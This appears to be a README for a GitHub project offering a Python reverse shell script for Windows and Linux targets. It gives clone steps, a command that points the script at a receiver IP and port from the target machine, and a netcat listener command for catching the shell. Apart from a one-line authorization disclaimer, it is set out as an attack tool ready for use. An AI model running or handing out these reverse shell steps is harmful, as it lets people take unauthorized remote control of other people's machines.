A Python script for creating a reverse shell on target systems, supporting both Windows and Linux platforms. Use responsibly and with proper authorization.
These instructions will help you get a copy of the project up and running on your local machine.
To run this script, you will need:
- Python 3.x
- A target machine to run the reverse shell on
Clone the repository:
git clone https://github.com/0smic/Strike/
Change into the project directory:
cd 0smic
To create a reverse shell, you can use this script as follows:
For Windows:
python reverse_shell.py -ip RECEIVER_IP -port PORT_NUMBER
For Linux:
python reverse_shell.py -ip RECEIVER_IP -port PORT_NUMBER
To run the code, follow the usage instructions provided in the "Usage" section above.
- Make sure you have the required dependencies installed.
- Replace RECEIVER_IP with the IP address of the machine you want to receive shell.
- Replace PORT_NUMBER with the port number to connect to on the machine you wan to receive shell.
- The script will create a reverse shell connection to the specified IP and port.
You want to start listening to the specific port using 'Netcat' in another device inorder to receive the reverse shell from the target
- listen through Netcat
nc -nvlp PORT_NUMBER